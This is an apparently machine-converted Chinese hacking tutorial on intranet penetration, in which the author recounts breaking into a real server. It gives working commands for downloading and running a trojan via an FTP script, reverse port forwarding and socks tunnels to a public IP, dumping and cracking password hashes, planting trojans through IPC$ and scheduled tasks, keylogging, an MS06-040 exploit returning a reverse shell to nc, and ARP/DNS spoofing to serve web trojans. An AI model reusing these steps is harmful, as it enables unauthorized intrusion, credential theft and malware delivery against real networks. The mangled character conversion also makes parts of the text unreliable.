內(nèi)網(wǎng)滲透專題文章

常常在一些BBS里和一些雜志里看到,滲透滲出XX網(wǎng)站， 實(shí)在就是拿了扔了一個(gè)WEBSHELL在上面， 嚴(yán)格來(lái)說(shuō)這根本算不上滲透滲出。 由于當(dāng)你進(jìn)了XX內(nèi)網(wǎng)面臨N多的機(jī)器的時(shí)候， 才知道， 內(nèi)網(wǎng)是多么的龐大。 下面我們先來(lái)看兩張內(nèi)網(wǎng)的拓?fù)浣Y(jié)構(gòu)圖， 圖1， 圖2所示。 假如有的朋友現(xiàn)在還不了解路由器和交換機(jī)等什么意思， 那應(yīng)該好好補(bǔ)習(xí)一下了。 這里在說(shuō)一下什么叫內(nèi)網(wǎng)， 可能有的朋友認(rèn)192.168.1.x這樣的形式就是內(nèi)網(wǎng)， 前段時(shí)間qq上一朋友掛出一臺(tái)機(jī)器， 告訴我有內(nèi)網(wǎng)， 我問(wèn)他怎么判定的， 他說(shuō)執(zhí)行ipconfig /all的時(shí)候看見內(nèi)網(wǎng)地址了， 實(shí)在這樣判定太過(guò)草率， 好比說(shuō)我為了安全， 我自己買了一個(gè)路由器那么在我的電腦執(zhí)行ipconfig /all的時(shí)候IP地址也是內(nèi)網(wǎng)， 實(shí)在我有內(nèi)網(wǎng)嗎？是沒有的。

　　在滲透滲出內(nèi)網(wǎng)之前我們先來(lái)了解一下局域網(wǎng)常見的拓?fù)浣Y(jié)構(gòu)， 網(wǎng)絡(luò)中的計(jì)算機(jī)等設(shè)備要實(shí)現(xiàn)互聯(lián)， 就需要以一定的結(jié)構(gòu)方式進(jìn)行連接， 這種連接方式就叫做"拓?fù)浣Y(jié)構(gòu)"， 通俗地講這些網(wǎng)絡(luò)設(shè)備如何連接在一起的。 目前常見的網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)主要有以下四大類：1、星型結(jié)構(gòu)， 2、環(huán)型結(jié)構(gòu)， 3、總線型結(jié)構(gòu)， 4、星型和總線型結(jié)合的復(fù)合型結(jié)構(gòu)。 由于文章是討論滲透滲出內(nèi)網(wǎng)的， 所以每種的具體先容， 我就不列出來(lái)了， 大家簡(jiǎn)樸了解下就可以了， 有愛好的可以每一種都百度下。

　　可能剛?cè)腴T的朋友不是很了解為什么內(nèi)網(wǎng)而我們還能訪問(wèn)到呢， 現(xiàn)在良多服務(wù)器都是用了硬件防火墻作的映射， 也就是說(shuō)他的所有服務(wù)器實(shí)在都在防火墻以后并且沒有外網(wǎng)IP， 可能有人會(huì)說(shuō)， 沒有外網(wǎng)IP那我們?cè)L問(wèn)它網(wǎng)站用的IP是什么呢？假如使用硬件防火墻配置過(guò)這種環(huán)境過(guò)朋友就明白了， 這是現(xiàn)在良多包括海內(nèi)至公司流行的NAT配置方法， 這樣相對(duì)來(lái)說(shuō)比較安全， 這樣就需要我們?cè)跐B透滲出的時(shí)候做端口映射。

　　下面我把以前入侵滲透滲出的幾回內(nèi)網(wǎng)過(guò)程并把一些思路， 一些高手們的滲透滲出經(jīng)驗(yàn)， 和一些用到或沒用到的工具都綜合的說(shuō)一下。 首先是通過(guò)腳本漏洞獲得了一個(gè)WEBSHELL， 服務(wù)器開的端口有21和80， 并沒有開過(guò)多的端口， 沒有裝SU， pcAnywhere等第三方軟件， wscript.shell為真， 上傳CMD能執(zhí)行一些簡(jiǎn)樸的命令， 其他腳本木馬權(quán)限一樣， 這臺(tái)服務(wù)器上面就兩個(gè)站， 目錄權(quán)限不是很嚴(yán)， 發(fā)現(xiàn)D盤下有一個(gè)字符替代器， 如圖3所示。 直接把下回本地看看是什么東東， 原來(lái)是一個(gè)查找字符的工具， 如圖4所示。

　　難道這站以前讓人搞過(guò)， 治理員用來(lái)查找被改文件的， 試了一下可以改名， 如圖5， 那么好辦了， 我直接捆了一個(gè)木馬在上面， 把這個(gè)刪掉， 等著治理員上線吧， 等了兩天治理員仍是沒有上線， 這么等下去也不是辦法， 只好把首頁(yè)涂了， 告訴他網(wǎng)站有漏洞， 已被人植入木馬， 請(qǐng)查找木馬之類的， 并修改了幾個(gè)重要文件的時(shí)間， 果然治理員上線了。 如圖6。

　　執(zhí)行ipconfig /all果然有內(nèi)網(wǎng)IP， 圖7。 既然沒開終端太不利便， 我直接幫它開了吧， 后來(lái)這臺(tái)機(jī)器我又做了VPN， 開3389可以用手工和工具都可以的， 這里帶給大家二個(gè)開3389的工具， 都還比較不錯(cuò)， 一個(gè)是火狐的開3389的工具， 另一個(gè)是特南克斯， 這里我用的是特南克斯的， 至于怎么把程序傳到肉雞上辦法良多， 可以用遠(yuǎn)程程序直接傳， 也可以在本機(jī)架FTP服務(wù)器， 用到20cn的FTP服務(wù)器， 圖8。 設(shè)置好用戶和密碼后cmdshell里執(zhí)行：

echo o 你架設(shè)FTP的IP>ftp.txt

echo hacklu>>ftp.txt　　　　　　　//寫入ftp.txt用戶名

echo 123456>>ftp.txt　　　　　　//寫入ftp.txt密碼

echo bin>>ftp.txt　　　　　　　//二進(jìn)制方式轉(zhuǎn)輸

echo get 11.exe>>ftp.txt　　　//將11.exe下載到肉雞

echo bye>>ftp.txt　　　　　　//斷開FTP

type ftp.txt　　　　　　　　//查看寫入是否有錯(cuò)誤　

ftp -s:ftp.txt              //執(zhí)行FTP.TXT里的內(nèi)容

del ftp.txt　　　　　　    //刪除ftp.txt

這樣我們就可以把11.exe下載到肉雞運(yùn)行就可以了， 也可以用0803期雜志提到的VBS工具， 適合不超過(guò)300KB的程序。 把EXE轉(zhuǎn)成BAT在上傳， 工具運(yùn)行好會(huì)自動(dòng)判定是2000系統(tǒng)或者2003系統(tǒng)， 2000系統(tǒng)則自己重啟， 也可以自定義終端端口， 運(yùn)行結(jié)果如圖9所示。

　　在執(zhí)行netstat -an發(fā)現(xiàn)3389開放， 當(dāng)然這樣直接連是連接不上的， 由于我們外界是無(wú)法直接訪問(wèn)到內(nèi)部機(jī)器的， 但可以讓內(nèi)網(wǎng)機(jī)器來(lái)訪問(wèn)我們， 好比現(xiàn)在流行的反彈木馬， 這樣就需要我們做端口映射， 說(shuō)到端口映射工具當(dāng)然代表作就是LCX寫的工具了， 首先在本機(jī)執(zhí)行l(wèi)cx -listen 99 9833， 在肉雞上執(zhí)行l(wèi)cx -slave 123.114.120.115 127.0.0.1 99 3389， 意思是在本機(jī)監(jiān)聽99和9833端口， 把99端口數(shù)據(jù)轉(zhuǎn)到9833上面， 然后把肉雞的3389端口數(shù)據(jù)轉(zhuǎn)到本機(jī)的99端口上， 然后就可以拿連接器連接本地的9833端口了， 如圖10所示。

　　而希奇的是這次卻沒有連上， 那就用下教主的高級(jí)內(nèi)網(wǎng)滲透滲出工具Paris， 工具其他功能未幾說(shuō)了， 只說(shuō)下端口映射的功能， 傳msxidc和vVXDc.dll到目標(biāo)內(nèi)網(wǎng)機(jī)器， 在目標(biāo)機(jī)器執(zhí)行：msxidc -l127.0.0.1 -p3389 -m82 -s61.149.230.28 -r22， 在自己機(jī)器或者有公網(wǎng)IP的肉雞：MAPServer.EXE -p22， 這時(shí)候只要連接本機(jī)的或者公網(wǎng)IP肉雞的22端口就可以了， 在說(shuō)一款比較不錯(cuò)的工具， htran.exe， 能開啟Socks5服務(wù)， 但我們只說(shuō)端口映射， 命令：在公網(wǎng)肉雞監(jiān)聽(臨聽任意兩個(gè)端口):htran -p -listen 119 120， 在內(nèi)網(wǎng)的機(jī)器執(zhí)行：htran -p -slave 公網(wǎng)肉雞IP 119 127.0.0.1 3389， 這樣是把這個(gè)內(nèi)網(wǎng)肉雞的3389轉(zhuǎn)發(fā)到公網(wǎng)肉雞或者自己機(jī)器的119端口上， 然后再用3389登陸器連接公網(wǎng)肉雞的120端口。 或者連接本機(jī)的120端口， 如圖11所示。 這幾款工具各有上風(fēng)， 大家在滲透滲出的時(shí)候根據(jù)需要自己選擇吧。

   端口映射大家在滲透滲出的時(shí)候可能已經(jīng)不少朋友用過(guò)了， 但很少看到有人是直接反彈代辦代理來(lái)連接， 反彈socks代辦代理好處是我們直接可以連接內(nèi)網(wǎng)的其它機(jī)器， 而不需要在去轉(zhuǎn)端口。 最近“凋凌玫瑰”寫了一個(gè)內(nèi)網(wǎng)滲透滲出利器---hd， 使用方法如下， 首先在本機(jī)監(jiān)聽：

c:\>hd -s -listen 53 1180

[+] Listening ConnectBack Port 53 ......

[+] Listen OK!

[+] Listening Socks5 Agent Port 1180 ......

[+] Listen2 OK!

[+] Waiting for MainSocket on port:53 ......

此命令是將連接進(jìn)來(lái)的53端口的數(shù)據(jù)包連接到1180端口。

在對(duì)方機(jī)器上運(yùn)行:

C:\RECYCLER>hd -s -connect x.x.x.x 53

[+] MainSocket Connect to x.x.x.x:53 Success!

[+] Send Main Command ok!

[+] Recv Main Command ok!

[+] Send Main Command again ok!

上面的x.x.x.x為你的外網(wǎng)ip， 這時(shí)我們接收到反彈歸來(lái)的代辦代理顯示的情況。 如圖12。 然后在本機(jī)設(shè)置sockscap， 設(shè)置在控制臺(tái)的”文件”-“設(shè)置”里， 控制臺(tái)可以將你需要代辦代理的程序放在上面， 直接拖進(jìn)去即可， 控制臺(tái)機(jī)的程序就可以進(jìn)接連接內(nèi)網(wǎng)的機(jī)器了。 如直接用mstsc連接內(nèi)網(wǎng)其它機(jī)器的3389， 就可以上去登錄治理。 如圖13,14所示。

　　進(jìn)了3389后我們第一步需要干什么？可能良多朋友都是留后門， 像什么上帝之門、SHIFT后門， 記實(shí)3389帳號(hào)等等。 當(dāng)然留什么后門好不在本文討論之中。 我個(gè)人比較喜歡抓HASH(哈希),一般是pwdump+lc5， 一般我破解的時(shí)候數(shù)字加字母的10位組合在3個(gè)小時(shí)左右就可以破得出來(lái)， 而且現(xiàn)在還有破解HASH的彩虹表， 不外體積是很龐大的， 在有前段時(shí)間在網(wǎng)上看見一篇文章， 文章名字是“卸載補(bǔ)丁去除保護(hù) 獲取Windows 2003密碼”， 大致意思是卸載Windows2003 SP1/SP2， 由于windows 2003 +SP0才可以利用findpass從winlogin進(jìn)程中抓出系統(tǒng)賬號(hào)明文密碼， 抓出密碼在重安裝上補(bǔ)丁。 我個(gè)人沒有實(shí)驗(yàn)過(guò)， 此方法很暴力， 我個(gè)人也不推薦這么做， 很輕易被發(fā)現(xiàn)的。

　　那什么是HASH呢？Hash簡(jiǎn)樸點(diǎn)講就是把任意一段數(shù)據(jù)經(jīng)由某種算法天生一段獨(dú)一的固定長(zhǎng)度的數(shù)據(jù)。 Hash， 一般翻譯做"散列"， 也有直接音譯為"哈希"的， 通過(guò)散列算法， 變換成固定長(zhǎng)度的輸出， 該輸出就是散列值。 HASH主要用于信息安全領(lǐng)域中加密算法， 他把一些不同長(zhǎng)度的信息轉(zhuǎn)化成雜亂的128位的編碼里,叫做HASH值. 也可以說(shuō)， hash就是找到一種數(shù)據(jù)內(nèi)容和數(shù)據(jù)存放地址之間的映射關(guān)系。 對(duì)于哈希菜鳥也可以這么理解， 即保留電腦上治理員登錄的一種加密后的密碼， 至于什么具體加密算法， 有愛好的朋友可以百度下， 例如我這里用的是SAMInside抓HASH， 程序打開后我們選擇小人這里， 點(diǎn)擊使用LSASS輸入本地用戶， 如圖15。 這樣計(jì)算機(jī)的用戶名和HASH值就會(huì)泛起在列表里， 如圖16。

　　直接點(diǎn)右上方的開始就可以破解密碼了， 圖17所示， 也可以導(dǎo)出用LC5破解， 在選擇－－文件－－輸出用戶到PWDUMP， 這樣把HASH保留為文件文件， 圖18。 也可以用PWDUMP抓， 如圖19， 最后我們把內(nèi)容復(fù)制下來(lái)保留文本文件用LC5破解， LC5的安裝非常的簡(jiǎn)樸， 一直下一步即可。 程序自己帶注冊(cè)機(jī)， 我們?cè)谧��?cè)一下， 完事后我們?cè)诔绦蛑黜?yè)面導(dǎo)入剛才保留的hash.txt， 點(diǎn)擊導(dǎo)入按鈕（第六個(gè)）， 在選擇從PWDUMP文件， 用戶列表就會(huì)顯示出來(lái)了， 在點(diǎn)擊開始就可以破解了， 如圖20,21所示。

　　而對(duì)于2000的系統(tǒng)我們直接可以用MT讀出密碼， 直接運(yùn)行mt -findpass,如圖22所示， 為什么要破解本秘要碼， 由于在內(nèi)網(wǎng)滲透滲出的過(guò)程中抓出一臺(tái)治理員的密碼是很重要的， 現(xiàn)在我們有了內(nèi)網(wǎng)一臺(tái)機(jī)器了， 當(dāng)然要繼承滲透滲出下去， 在這里我總結(jié)一下幾種方法， 方法一、掃描弱口令， ipc$連接。 方法二、靠自己的命運(yùn)運(yùn)限和治理員的懶惰加社會(huì)工程學(xué)。 方法三、溢出。 方法四、arp欺騙， DNS欺騙。 方法五、域結(jié)構(gòu)下的滲透滲出。 這里簡(jiǎn)樸的總結(jié)五方面， 但是每一方面詳細(xì)利用起來(lái)又包括很細(xì)節(jié)在里面。

方法一、掃描弱口令， ipc$連接。

　　可以用XScan-v3.3掃描器掃一下內(nèi)網(wǎng)， 設(shè)置好IP和端口， 端口設(shè)置可以查看本機(jī)裝有什么軟件， 例如本機(jī)裝有radmin， pcAnywhere等等， 那我們就掃描4899,5631等端口， 如圖23， 然后用本機(jī)的知道的密碼去連接。 當(dāng)然假如改成別的端口我們根據(jù)情況轉(zhuǎn)換一下， 有的時(shí)候在外網(wǎng)的機(jī)器很堅(jiān)固， 到了內(nèi)網(wǎng)的時(shí)候就很脆弱了。 當(dāng)然現(xiàn)在機(jī)器已經(jīng)很少弱口令了， 但是我們有本機(jī)治理員帳戶和密碼， 治理員為了利便往往都設(shè)置成一樣的， 由于做系統(tǒng)的時(shí)候做完一臺(tái)直接GHOST別的系統(tǒng)。 而ipc$連接可以是說(shuō)長(zhǎng)短常古老和經(jīng)典的。

IPC 是Internet Process Connection的縮寫， 也就是遠(yuǎn)程網(wǎng)絡(luò)連接。 WindowsNT/2000/XP/2003默認(rèn)都提供了IPC$管道連接， 就是在兩個(gè)計(jì)算機(jī)進(jìn)程之間建立通訊連接。 打個(gè)比方， IPC連接就像是挖好的隧道， 程序可通過(guò)隧道訪問(wèn)遠(yuǎn)程主機(jī)。 默認(rèn)情況下， IPC是共享的， 也就是說(shuō)微軟已經(jīng)為我們挖好了這個(gè)隧道（IPC）， 因此， 這種基于IPC的入侵也經(jīng)常被簡(jiǎn)稱為IPC入侵。 IPC 后面的$是共享的意思， 不外是躲藏的共享， 微軟系統(tǒng)頂用“$”表示躲藏的共享， 好比C$就是躲藏的共享C盤。 也就是說(shuō)C盤是共享的。 ipc$連接這個(gè)只能說(shuō)是治理員開的共享， 嚴(yán)格來(lái)說(shuō)不能算一個(gè)漏洞， 目標(biāo)主機(jī)還需知足兩個(gè)前提：1、目標(biāo)主機(jī)開啟了ipc$共享 ；2、擁有目標(biāo)主機(jī)的治理員帳號(hào)和密碼 。 當(dāng)年在2000系統(tǒng)的時(shí)候ipc$入侵可以說(shuō)是風(fēng)扉一時(shí)。

　　這里我用兩臺(tái)XP做演示， 打開命令提示符在CMD下輸入：net use \\IP\ipc$ "password" /user:"username" 建立非空連接， 接著copy \路徑\*.exe \\IP\共享目錄名， 向遠(yuǎn)程主機(jī)復(fù)制文件， 接著net time \\IP， 查看遠(yuǎn)程主機(jī)確當(dāng)前時(shí)間， 圖24所示， 接著就可以用計(jì)劃任務(wù)運(yùn)行我們COPY過(guò)去的程序了， 執(zhí)行at \\ip 時(shí)間 程序名， 遠(yuǎn)程添加計(jì)劃任務(wù)， 圖25所示。 可以按照我們劃定的時(shí)間內(nèi)運(yùn)行程序， 假如對(duì)方禁止了計(jì)劃任務(wù)， 默認(rèn)是開啟的， 我們可以把文件復(fù)制到對(duì)方啟動(dòng)目錄， 先執(zhí)行net use z: \\IP\c$， 是把對(duì)方C盤映射到本機(jī)Z盤上， 這樣我們直接將木馬放在啟動(dòng)目錄， 如圖26所示。 等復(fù)制完了想斷開了可以用命令， net use z: /del /y， 這樣可以刪除映射的z盤 假如有朋友也手工輸入命令麻煩， 也可以用20CN的IPC掃描器， 可以同步植入木馬。 如圖27所示。 在域控的環(huán)境中， 我們只要得到域控密碼就可以直接用ipc連接治理員機(jī)器種馬。 后面會(huì)先容域環(huán)境下的滲透滲出。

方法二、靠自己的命運(yùn)運(yùn)限和治理員的懶惰加社會(huì)工程學(xué)。 （推薦非安全出的黑客社會(huì)工程學(xué)攻擊一書）

　　這里所說(shuō)的命運(yùn)運(yùn)限是剛才說(shuō)過(guò)的， 好比說(shuō)治理員為了利便設(shè)置“密碼一卡通”掃描內(nèi)網(wǎng)開3389端口的機(jī)器， 用破出來(lái)的本秘要碼連接所有開3389的機(jī)器， 我曾經(jīng)入侵一個(gè)臺(tái)灣的內(nèi)網(wǎng)就是密碼都是一樣的， 或者可以在本機(jī)裝上鍵盤記實(shí)， 安裝鍵盤記實(shí)的目地不光是記實(shí)本秘要碼， 是記實(shí)治理員一切的密碼， 好比說(shuō)信箱， WEB網(wǎng)頁(yè)密碼等等， 這樣也可以得到治理員的良多信息。

　　這里我用的是鍵盤記實(shí)巨匠， 首先運(yùn)行keyboardlog.exe， 然后點(diǎn)"開起監(jiān)控"， 留意這個(gè)程序只要運(yùn)行一次就可以了， 以后開機(jī)的時(shí)候自動(dòng)運(yùn)行。 程序運(yùn)行后如圖28的界面， 我們點(diǎn)擊開始監(jiān)控就可以了。 這個(gè)工具可以記實(shí)中文， 這點(diǎn)對(duì)于有些機(jī)器仍是不錯(cuò)的， 記實(shí)的文件可以設(shè)置， 方法為修改config.ini里的文件. 格局為如 c:\1111.txt,然后再運(yùn)行keyboardlog.exe,點(diǎn)擊休止監(jiān)控， 然后再重新點(diǎn)開始監(jiān)控。 如圖29是記實(shí)到的內(nèi)容。 至于記實(shí)的什么內(nèi)容就要靠大家去分析然后配合社會(huì)工程學(xué)了。

方法三、內(nèi)網(wǎng)溢出。

　　溢出從技術(shù)角度可以分為堆溢出和棧溢出， 這點(diǎn)我們先不說(shuō)， 從另一個(gè)角度則分為遠(yuǎn)程（remote）溢出和本地（local）溢出， 遠(yuǎn)程溢出也就是通過(guò)對(duì)方的一些網(wǎng)絡(luò)上的服務(wù)對(duì)我們提交的的數(shù)據(jù)沒有嚴(yán)格的檢查， 我們提交一些精心構(gòu)造的數(shù)據(jù)， 可以迫使對(duì)方的主機(jī)執(zhí)行我們指定的動(dòng)作：好比添加用戶， 打開端口， 反彈一個(gè)SHELL給我們等等。

　　這種方法放在現(xiàn)在來(lái)說(shuō)可以說(shuō)是成功率很低的， 由于現(xiàn)在基本都是自己打補(bǔ)丁了， 假如在向撤退退卻個(gè)二三年仍是可以的， 但并不代表沒有一點(diǎn)不可能， 06的時(shí)候朽木在騰訊內(nèi)網(wǎng)的時(shí)候就是靠嗅域治理員的哈希和MS06035溢出其他的機(jī)器， 對(duì)于比較火的05年的MS05039,06年的MS06035、06040， 07年DNS溢出等等， 這就需要我們多關(guān)注一下“http://www.microsoft.com/china/technet/Security/current.mspx”微軟漏洞發(fā)布的地方， 當(dāng)然內(nèi)網(wǎng)溢出不一定非得靠系統(tǒng)漏洞， 可以查看本機(jī)裝有那些第三方程序， 然后溢出其他機(jī)器的， 這里我以06040+2000系統(tǒng)為例， 首先我們用Superscan3.0掃描內(nèi)網(wǎng)開放445端口， 如30所示。

　　在本機(jī)用NC監(jiān)聽1234端口， 執(zhí)行nc -l -v -p 1234， 如圖31， 然后用另一個(gè)CMD窗口執(zhí)行， ms06040rpc 對(duì)方IP 本機(jī)IP 1234 1， 這樣用NC監(jiān)聽的端口會(huì)返回了對(duì)方的CMDSHELL， 如圖32、33所示。 在得到CMDSHELL之后， 是添加用戶或者給機(jī)器中木馬， 就看見大家興趣了。 另外也可以用去年比較火的DNS溢出， DNS服務(wù)一般開放53端口。 DNS服務(wù)器在有的時(shí)候就是域服務(wù)器， 關(guān)于域環(huán)境下參考方法五。

方法四、arp欺騙， DNS欺騙。

　　這個(gè)方法是比較實(shí)用， 所以多先容一下。 但同是也是比較輕易暴露自己的， 不少同行在C段方面和內(nèi)網(wǎng)方面用的都是ARP欺騙， 不少菜菜可能還記得雜志常常看到嗅探的時(shí)候用到的ARP欺騙， 我們?cè)賮?lái)溫習(xí)一下吧。 首先在內(nèi)網(wǎng)機(jī)器輸入arp -a， 如圖34所示。 這里第一列顯示的是ip地址， 第二列顯示的是和ip地址對(duì)應(yīng)的網(wǎng)絡(luò)接口卡的硬件地址（MAC）， 第三列是該ip和mac的對(duì)應(yīng)關(guān)系類型。 可見， arp是一種將ip轉(zhuǎn)化成以ip對(duì)應(yīng)的網(wǎng)卡的物理地址的一種協(xié)議， 或者說(shuō)arp協(xié)議是一種將ip地址轉(zhuǎn)化成MAC地址的一種協(xié)議。 它靠維持在內(nèi)存中保留的一張表來(lái)使ip得以在網(wǎng)絡(luò)上被目標(biāo)機(jī)器應(yīng)答。

1、什么是MAC地址、MAC地址也叫物理地址， 硬件地址或鏈路地址， 同網(wǎng)絡(luò)設(shè)備制造商出產(chǎn)時(shí)寫在硬件內(nèi)部。 IP地址與MAC地址在計(jì)算機(jī)里都是以二進(jìn)制表示的。 IP地址是32位的， 而MAC地址則是48位的。 MAC地址的長(zhǎng)度為48位（6個(gè)字節(jié)）， 通常表示為12個(gè)16進(jìn)制數(shù)， 每2個(gè)16進(jìn)制之間用冒號(hào)隔開， 如08:00:20:0A:8C:6D就是一個(gè)MAC地址， 其中前3位16進(jìn)制數(shù)08:00:20代表網(wǎng)絡(luò)硬件制造商的編號(hào)， 它由IEEE（電子與電子工程師協(xié)會(huì)）分配， 而后3位16進(jìn)制數(shù)0A:8C:6D代表該制造商所制造的某個(gè)網(wǎng)絡(luò)產(chǎn)品（如網(wǎng)卡）的系列號(hào)。 輸入ipconfig /all就可以看見本機(jī)的MAC地址。

2、什么是ARP， 大家都知道計(jì)算機(jī)通訊是要有IP地址的吧！可是在局域網(wǎng)中， 計(jì)算機(jī)之間的通訊是只靠MAC地址來(lái)發(fā)送數(shù)據(jù)的。 ARP是一種協(xié)議， 用來(lái)實(shí)現(xiàn)IP地址到MAC地址的轉(zhuǎn)換， 假設(shè)192.168.1.1要發(fā)一個(gè)數(shù)據(jù)給192.168.1.101， 它就會(huì)發(fā)出arp廣播包問(wèn)：“誰(shuí)是192.168.1.101？我要你的MAC地址！”這時(shí)候192.168.1.101會(huì)回答：“我是192.168.1.101， 我的MAC是AA-AA-AA-AA-AA-AA。 ”然后192.168.1.1就會(huì)把這個(gè)回答記實(shí)下來(lái)， 然后再發(fā)數(shù)據(jù)給192.168.1.101的時(shí)候就直接構(gòu)造目地地址為AA-AA-AA-AA-AA-AA的數(shù)據(jù)包發(fā)送。

3、什么是ARP欺騙、經(jīng)由剛才的ARP查詢的過(guò)程我們知道， 在詢問(wèn)的過(guò)程中， 國(guó)為不知道到底誰(shuí)才是192.168.1.101， 所以192.168.1.1發(fā)出的是廣播包來(lái)詢問(wèn)， 其它的電話固然也收到了這個(gè)包但是并不回答。 如果現(xiàn)在有個(gè)人， 192.168.1.102居心不良， 想冒充192.168.1.101， 他也可以給192.168.1.1發(fā)一個(gè)回答的數(shù)據(jù)包說(shuō)：“我才是192.168.1.101， 我的MAC地址是BB-BB-BB-BB-BB。 ”那么192.168.1.1就會(huì)把原先的那條記實(shí)從MAC地址表中刪除掉， 寫入新的這個(gè)地址對(duì)應(yīng)關(guān)系， 這就是arp欺騙。

4、什么是網(wǎng)關(guān)、在局域網(wǎng)中， 所有的電腦可能是共用一個(gè)網(wǎng)絡(luò)出口， 這個(gè)出口就是網(wǎng)關(guān)了。 網(wǎng)關(guān)可以是一臺(tái)電腦， 也可以是一個(gè)路由器的某個(gè)接口， 它一樣有自己的IP地址， 局域網(wǎng)中所有的要發(fā)到外部的數(shù)據(jù)包都直接遞交給網(wǎng)關(guān)， 網(wǎng)關(guān)負(fù)責(zé)將這個(gè)數(shù)據(jù)包傳遞到遠(yuǎn)程網(wǎng)絡(luò)， 再將外界返回的數(shù)據(jù)分發(fā)給局域網(wǎng)中的指定電腦。

  　TCP/IP協(xié)議是如斯的脆弱， ARP協(xié)議在設(shè)計(jì)確當(dāng)初并沒有充分的考慮到安全題目， 所以今天才泛起N多的arp欺騙工具， 在先容工具之前， 我們?cè)賮?lái)談?wù)劮��?wù)器在機(jī)房中的情況。 一般而言， 現(xiàn)在流行的的主機(jī)托管方式置放的服務(wù)器是和良多別的服務(wù)器放在一個(gè)機(jī)柜上， 大家共用一個(gè)交換機(jī)共享100M的帶寬， 這樣就造成了一個(gè)題目， 那些沒有做端口隔離的的機(jī)房（絕大多數(shù)機(jī)房都是這樣的）每個(gè)交換機(jī)下的所有服務(wù)器構(gòu)成一個(gè)局域網(wǎng)。 在這個(gè)局域網(wǎng)下， 大家就可以玩arp欺騙了。

　　說(shuō)到arp嗅探的工具要先提一下有一定的位置的cain， 官方最新版為4.918， 我們先要進(jìn)行安裝， 如圖35所示。 直接NEXT下一步就可以了， 安裝好我們運(yùn)行CAIN， 點(diǎn)擊Sniffer， 在選擇工具欄第二個(gè)按鈕， 在點(diǎn)擊十字架， 在彈出對(duì)話框中我們選擇子網(wǎng)中所有計(jì)算機(jī)， 如圖36所示。

　　在Configure選項(xiàng)里我們可以根據(jù)需要選擇端口， 如21、80、3389等。 如圖37所示。 這時(shí)在選擇下面的arp， 十字按鈕是灰色的， 我們點(diǎn)擊一下空缺處， 在選擇十字按鈕， 在彈出的對(duì)話框里左邊選擇網(wǎng)關(guān)， 右邊選擇欺騙的IP。 最后點(diǎn)開始嗅探， 上面第二個(gè)按鈕。 如圖38所示。 這樣就能嗅到數(shù)據(jù)了， 圖39是嗅到的HTTP密碼。 另外假如嗅到了3389密碼我們?cè)谏厦娲蜷_文檔， 在里面可以找到密碼， 如圖40所示。

　　大家在用CAIN嗅探的時(shí)候可能碰到過(guò)這樣的情況， 數(shù)據(jù)一大就當(dāng)機(jī)了， 過(guò)了很少時(shí)間都連不上了， 所以這時(shí)候就需要我們盡可能把不需要嗅探的端口都去掉。 這樣會(huì)大大的減少當(dāng)機(jī)的可能性。 假如看到丟包率超過(guò)10%就要留意啦， 趕快停掉， 看看那里沒設(shè)置好吧。 另外提供一個(gè)“chong”寫的BAT程序， 在開嗅的時(shí)候運(yùn)行它就可以了。

======start=========

:ping

ping g.cn

IF ERRORLEVEL   1 GOTO reboot

IF ERRORLEVEL   0 GOTO ping

:reboot

iisreset /reboot

======end=========

這里的g.cn你可以設(shè)置為網(wǎng)關(guān)的IP或你的IP

假如能ping通的話就繼承ping 假如不通的話就以為當(dāng)機(jī)了 （事先自己先測(cè)試下）。

　　在說(shuō)下DSN欺騙， 我們看下DNS是怎樣工作的， DNS是全稱是Domain Name Server， 既域名服務(wù)器。 當(dāng)一臺(tái)主機(jī)發(fā)送一個(gè)哀求要求解析某個(gè)域名時(shí)， 他會(huì)首先把解析哀求發(fā)到自己的DNS服務(wù)器上。 假如內(nèi)網(wǎng)里的192.168.1.101要訪問(wèn)百度www.baidu.com， 但不知道其IP地址， 這時(shí)192.168.1.101主機(jī)詢問(wèn)網(wǎng)關(guān)192.168.1.1， www.baidu.com的IP是多少， 假如這時(shí)候我們將冒充網(wǎng)關(guān)192.168.1.1返回給192.168.1.101他一個(gè)特定的含有網(wǎng)頁(yè)木馬的IP， 這樣就實(shí)現(xiàn)了DNS域名欺騙。

　　首先用前面的先容的列出內(nèi)網(wǎng)機(jī)器， 然后在ARP里選擇arp-DNS， 點(diǎn)擊空缺處激活十字按鈕， 彈出一個(gè)DNS欺騙對(duì)話框， 在哀求DNS域名欄中填入對(duì)方要訪問(wèn)的網(wǎng)站， 如www.baidu.com， 然后在用來(lái)改寫響應(yīng)的IP地欄， 如圖41所示。 而我們響應(yīng)的地址可以是一個(gè)網(wǎng)頁(yè)木馬的地址， 這里我以網(wǎng)關(guān)為例， 也就是說(shuō)192.168.1.101訪問(wèn)www.baidu.com的時(shí)候會(huì)轉(zhuǎn)向192.168.1.1的頁(yè)面， 我們先來(lái)訪問(wèn)一下192.168.1.1， 如圖42所示， 我們?cè)?92.168.1.104的機(jī)器上裝CAIN開始DSN欺騙后訪問(wèn)百度網(wǎng)頁(yè)， 如圖43所示。 是不是也和192.168.1.1一樣了， 假如我們?cè)诒炯茉O(shè)一個(gè)HTTP服務(wù)器， 掛上一個(gè)網(wǎng)馬后， 就能欺騙訪問(wèn)者了， 當(dāng)然假如想做的更像， 可以制作一個(gè)和欺騙主頁(yè)一樣的頁(yè)面。

方法五、域結(jié)構(gòu)下的滲透滲出。

　　在入侵域結(jié)構(gòu)內(nèi)網(wǎng)之前我們先來(lái)了解一下什么是域， 可能大家對(duì)工作組比較認(rèn)識(shí)了， 而域和工作組是不一樣的， 工作組是一群計(jì)算機(jī)的集合， 它僅僅是一個(gè)邏輯的集合， 各自計(jì)算機(jī)仍是各自治理的， 你要訪問(wèn)其中的計(jì)算機(jī)， 仍是要到被訪問(wèn)計(jì)算機(jī)上來(lái)實(shí)現(xiàn)用戶驗(yàn)證的。 而域不同， 域是一個(gè)有安全邊界的計(jì)算機(jī)集合， 在統(tǒng)一個(gè)域中的計(jì)算機(jī)彼此之間已經(jīng)建立了信任關(guān)系， 在域內(nèi)訪問(wèn)其他機(jī)器， 不再需要被訪問(wèn)機(jī)器的許可了。 也就是域用戶登錄， 超級(jí)大的權(quán)限。 而域還可以擴(kuò)展， 像域樹， 域林。 在一個(gè)網(wǎng)絡(luò)中既可以有多個(gè)多級(jí)子域、域樹， 還可以有多個(gè)林。

